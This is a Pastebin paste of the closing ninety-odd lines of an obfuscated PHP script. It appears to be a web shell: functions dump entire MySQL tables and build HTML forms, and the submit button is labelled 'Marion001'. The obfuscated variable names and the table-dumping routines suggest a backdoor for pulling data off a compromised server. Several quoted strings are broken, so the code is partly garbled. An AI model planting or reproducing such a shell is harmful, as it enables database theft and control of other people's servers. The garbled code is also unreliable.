  2780. if(!${firstfield}){${tabledump}.=",";
  2781. }else{$sstxjyrofmc="firstfield";
  2782. ${$sstxjyrofmc}=0;
  2783. }$tnzifxpashh="field";
  2784. ${$mwrymttnc}.="   $field[Field] $field[Type]";
  2785. if(!empty(${$tnzifxpashh}["Default"])){${tabledump}.=" DEFAULT '$field[Default]'";
  2786. }if(${field}["Null"]!="YES"){${tabledump}.=" NOT NULL";
  2787. }if(${field}["Extra"]!=""){${tabledump}.=" $field[Extra]";
  2788. }}fr(${fields});
  2789. ${$eltwwvx}=q("SHOW KEYS FROM $table");
  2790. while(${key}=mysql_fetch_array(${keys})){$kjemvlqxwkq="key";
  2791. ${kname}=${$kjemvlqxwkq}["Key_name"];
  2792. if(${"kname"}!="PRIMARY"&&${key}["Non_unique"]==0){${kname}="UNIQUE|$kname";
  2793. }if(!is_array(${"index"}[${kname}])){${index}[${kname}]=array();
  2794. }${index}[${kname}][]=${key}["Column_name"];
  2795. }fr(${"keys"});
  2796. while(list(${kname},${columns})=@each(${index})){${tabledump}.=",";
  2797. ${colnames}=implode(${columns},",");
  2798. if(${kname}=="PRIMARY"){$vcytdtxka="tabledump";
  2799. ${$vcytdtxka}.="   PRIMARY KEY ($colnames)";
  2800. }else{if(substr(${kname},0,6)=="UNIQUE"){$cdxnzyw="kname";
  2801. ${$cdxnzyw}=substr(${kname},7);
  2802. }${tabledump}.="   KEY $kname ($colnames)";
  2803. }}$eeporksg="fp";
  2804. ${tabledump}.=");
  2805. ";
  2806. if(${$eeporksg}){fwrite(${fp},${tabledump});
  2807. }else{$ekiovgyl="tabledump";
  2808. echo${$ekiovgyl};
  2809. }$jfgovkfi="fp";
  2810. ${rows}=q("SELECT * FROM $table");
  2811. ${numfields}=mysql_num_fields(${rows});
  2812. while(${row}=mysql_fetch_array(${rows})){$mfkjkyvnnbhn="fp";
  2813. ${tabledump}="INSERT INTO $table VALUES(";
  2814. ${"fieldcounter"}=-1;
  2815. ${firstfield}=1;
  2816. while(++${fieldcounter}<${numfields}){$dqfukijt="firstfield";
  2817. if(!${$dqfukijt}){${tabledump}.=", ";
  2818. }else{$qfyjppr="firstfield";
  2819. ${$qfyjppr}=0;
  2820. }if(!isset(${row}[${fieldcounter}])){${tabledump}.="NULL";
  2821. }else{${tabledump}.="'".mysql_escape_string(${row}[${fieldcounter}])."'";
  2822. }}${tabledump}.=");
  2823. ";
  2824. if(${$mfkjkyvnnbhn}){fwrite(${fp},${tabledump});
  2825. }else{echo${tabledump};
  2826. }}fr(${rows});
  2827. if(${$jfgovkfi}){fwrite(${fp},"");
  2828. }else{echo"";
  2829. }}function ue($str){return urlencode(${str});
  2830. }function p($str){echo${str}."";
  2831. }function tbhead(){p("<table width="100%\" border=\"0\" cellpadding=\"4\" cellspacing="0">");
  2832. }function tbfoot(){p("</table>");
  2833. }function makehide($name,$value=''){p("<input id=\"$name" type="hidden" name="$name" value="$value\" />");
  2834. }function makeinput($arg=array()){${arg}["size"]=${arg}["size"]>0?"size=\"$arg[size]"":"size=\"100\"";
  2835. ${arg}["extra"]=${arg}["extra"]?${arg}["extra"]:"";
  2836. !${arg}["type"]&&${arg}["type"]="text";
  2837. ${"arg"}["title"]=${"arg"}["title"]?${arg}["title"]."<br />":"";
  2838. ${"arg"}["class"]=${arg}["class"]?${arg}["class"]:"input";
  2839. if(${arg}["newline"]){p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]" id="$arg[name]\" value=\"$arg[value]" type="$arg[type]\" $arg[size] $arg[extra] /></p>");
  2840. }else{p("$arg[title]<input class="$arg[class]" name=\"$arg[name]" id=\"$arg[name]\" value="$arg[value]" type=\"$arg[type]" $arg[size] $arg[extra] />");
  2841. }}function makeselect($arg=array()){if(${arg}["onchange"]){$vsbgegw="arg";
  2842. ${onchange}="onchange="".${$vsbgegw}["onchange"].""";
  2843. }$djshskne="arg";
  2844. ${"arg"}["title"]=${arg}["title"]?${arg}["title"]:"";
  2845. if(${arg}["newline"])p("<p>");
  2846. p("$arg[title] <select class="input" id="$arg[name]" name="$arg[name]\" $onchange>");
  2847. if(is_array(${$djshskne}["option"])){foreach(${arg}["option"]as${key}=>${value}){if(${arg}["selected"]==${key}){p("<option value="$key" selected>$value</option>");
  2848. }else{p("<option value="$key">$value</option>");
  2849. }}}p("</select>");
  2850. if(${arg}["newline"])p("</p>");
  2851. }function formhead($arg=array()){$midcsemxonmw="arg";
  2852. !${arg}["method"]&&${arg}["method"]="post";
  2853. !${arg}["action"]&&${arg}["action"]=${self};
  2854. ${"arg"}["target"]=${arg}["target"]?"target=\$arg[target]"":"";
  2855. !${$midcsemxonmw}["name"]&&${"arg"}["name"]="form1";
  2856. p("<form name=\"$arg[name]" id="$arg[name]" action=\"$arg[action]" method="$arg[method]" $arg[target]>");
  2857. if(${arg}["title"]){$dnvmen="arg";
  2858. p("<h2>".${$dnvmen}["title"]." &raquo;
  2859. </h2>");
  2860. }}function maketext($arg=array()){!${arg}["cols"]&&${arg}["cols"]=100;
  2861. !${arg}["rows"]&&${arg}["rows"]=25;
  2862. ${"arg"}["title"]=${arg}["title"]?${"arg"}["title"]."<br />":"";
  2863. p("<p>$arg[title]<textarea class="area\" id="$arg[name]" name="$arg[name]\" cols=\"$arg[cols]\" rows="$arg[rows]" $arg[extra]>$arg[value]</textarea></p>");
  2864. }function formfooter($name=''){$bqdjjloit="name";
  2865. !${"name"}&&${$bqdjjloit}="submit";
  2866. p("<p><input class="bt\" name="".${"name"}."" id=\\\"".${name}."\\\" type=\"submit" value="Marion001\"></p>");
  2867. p("</form>");
  2868. }function formfoot(){p("</form>");
  2869. }function pr($a){echo"<pre>";
  2870. print_r(${a});
  2871. echo"</pre>";
  2872. }?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top